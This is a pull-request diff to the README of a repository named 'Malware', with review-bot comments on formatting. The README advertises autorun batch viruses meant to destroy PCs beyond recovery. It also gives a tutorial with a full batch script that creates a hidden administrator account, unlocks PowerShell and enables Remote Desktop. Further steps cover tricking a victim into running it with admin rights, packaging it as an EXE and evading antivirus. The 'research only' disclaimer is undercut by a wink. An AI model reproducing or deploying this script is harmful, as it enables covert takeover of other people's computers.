Update README.md #3

Open: wants to merge 1 commit into base: master
88 changes: 59 additions & 29 deletions README.md
@@ -1,11 +1,11 @@
# Malware

This is my first controbution!
## This is my first controbution revised.
And because I want to give something meaningful as well as just mess around, this repo is a collection of fun little viruses that pack a mean punch.

If you know anything about hacking you will know that batch files are commonly the scum of the hacking world, most tutorials will show you how to make "viruses" that are nothing more than pranks and gain the creator nothing more than a laugh, which is OK, but if you really want something to cause some actual lasting damage those pranks will be no help.

So here are a couple of actual batch file viruses included in this repo:
### So here are a couple of actual batch file viruses included in this repo:
1. Disablenet.bat
2. Shutdowns.bat
3. crashespc.bat
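
Review bot: the new heading "## This is my first controbution revised." carries the typo "controbution" over from the line it replaces and turns a full sentence into a level-2 heading. The same applies to "### So here are a couple of actual batch file viruses included in this repo:", which keeps its trailing colon as a heading. Suggest fixing the spelling and using short noun-phrase headings, leaving the sentences as body text beneath them.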
@@ -14,50 +14,80 @@ So here are a couple of actual batch file viruses included in this repo:
Please Note that the above mentioned viruses make use of the autorun.inf file to exploit the autorun feature and can easily infect a windows machine and their effect can be devistating.
Each .bat file can potencially destroy a PC if it's run individually. I have set them all to autorun, ensuring a non recoverable end result.

Additionally!!
#### Additionally!!

For an additional virus that is unlinked and unaffiliated with the .bat set please see the file named:
Complete_viruscode_Pascal:
For an additional virus that is unlinked and unaffiliated with the .bat set please see the file named:
Complete_viruscode_Pascal:

_____________________________________________________________________________________________________________________________


Here Is a Short Tutorial!
### Here Is a Short Tutorial!
Let's try to make an actual batch file virus to gain full access to another computer.
NOTE: The user is going to have to be tricked into opening a file that requires admin access.

The first step is to open notepad and type in:
#### The first step is to open notepad and type in:

@echo offnet user winsystem winsystem /addnet localgroup administrators winsystem /add powershell set-executionpolicy
@echo off
setlocal

unrestrictedpowershell $path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
REM Define user variables
set "username=winsystem"
set "password=winsystem"
set "registryPath=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"

powershell New-Item $path -Force | New-ItemProperty -Name winsystem -Value 0 -PropertyType DWord -Force reg add
REM Function to handle errors
:ErrorHandler
echo An error occurred: %1
exit /b 1

"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
REM Create a new user and add to administrators group
net user %username% %password% /add || call :ErrorHandler "Failed to create user %username%"
net localgroup administrators %username% /add || call :ErrorHandler "Failed to add user %username% to administrators group"

msg <insert your IP here> Its ready.

How it Works
REM Set PowerShell execution policy to unrestricted
powershell -Command "Set-ExecutionPolicy Unrestricted -Scope Process -Force" || call :ErrorHandler "Failed to set PowerShell execution policy"

REM Create a new registry entry to hide the user
powershell -Command "New-Item -Path '%registryPath%' -Force | New-ItemProperty -Name '%username%' -Value 0 -PropertyType DWord -Force" || call :ErrorHandler "Failed to create registry entry for %username%"

REM Allow remote desktop connections
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f || call :ErrorHandler "Failed to enable remote desktop connections"

REM Notify the user that the setup is complete
msg * "The setup is ready. Please connect to the server."

endlocal
exit /b 0


## How it Works

1. Creates a new user called winsystem with the password winsystem
2. Adds the new user as an admin.
3. Alows PowerShell scripts to run.
4. Hides the user from the Log in screen.
5. Allows RDP (Remote Desktop Protocol)
6. Sends the message "The setup is ready. Please connect to the server." To the pre-defined IP.

## Last step:

### Download:
https://www.computerhope.com/download/utility/Bat_To_Exe_Converter.zip

The first line creates a new user called winsystem with the password winsystem
The second line adds the new user as an admin.
The third line allows PowerShell scripts to run.
The fourth and fifth lines hide the user from the Log in screen.
The sixth line allows RDP (Remote Desktop Protocol)
The seventh line sends the IP address that is imputed the message "Its ready."
Last step:
Download https://www.computerhope.com/download/utility/Bat_To_Exe_Converter.zip then convert the batch file and remember to tick the box that says Add Administrator Manifest.
Then convert the batch file and remember to tick the box that says Add Administrator Manifest.

REMEMBER: When the box opens DO NOT CLOSE IT! Copy down the computer name, open cmd, and type: ping <the computer name you copied down>.
##### REMEMBER: When the box opens DO NOT CLOSE IT! Copy down the computer name, open cmd, and type: ping <the computer name you copied down>.

Thats all! As soon as you get the IP, Copy it and input it into RDP and log in as winsystem.
Thats all!
As soon as you get the IP, Copy it and input it into RDP and log in as winsystem.

NOTE: Replace the items in < > as the items specified (duh).
##### NOTE: Replace the items in < > as the items specified (duh).

This may be detected by antivirus, but if you join the regular .bat file with a different file a Trojan can be made with low detection rates.
This may be detected by antivirus, but if you join the regular .bat file with a different files a Trojan can be made with low detection rates.

Remember that all responsibilities are at your own risk.
Please use it only for research purposes. Do not download this!
##### Remember that all responsibilities are at your own risk.
Please use it only for research purposes. >_0
Seriously though. Do not download this!

Be careful not to infect yourself when accessing and experimenting with malicious software!
###### Be careful not to infect yourself when accessing and experimenting with malicious software!
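
Review bot: the numbered "How it Works" list added in this hunk documents what the script changes on a machine, but the README still gives no way to recognise or reverse those changes. Suggest a short cleanup section covering the same items the list names: the winsystem account and its membership in administrators, the winsystem value under Winlogon\SpecialAccounts\UserList, and fDenyTSConnections under Control\Terminal Server. On style, the closing notes use heading levels ##### and ###### for emphasis (REMEMBER, NOTE, the final warning), which clutters the document outline; bold text would do. Step 3 has the typo "Alows", the added "with a different files" is ungrammatical, and the ">_0" appended to the research-only line undercuts the warning it sits in.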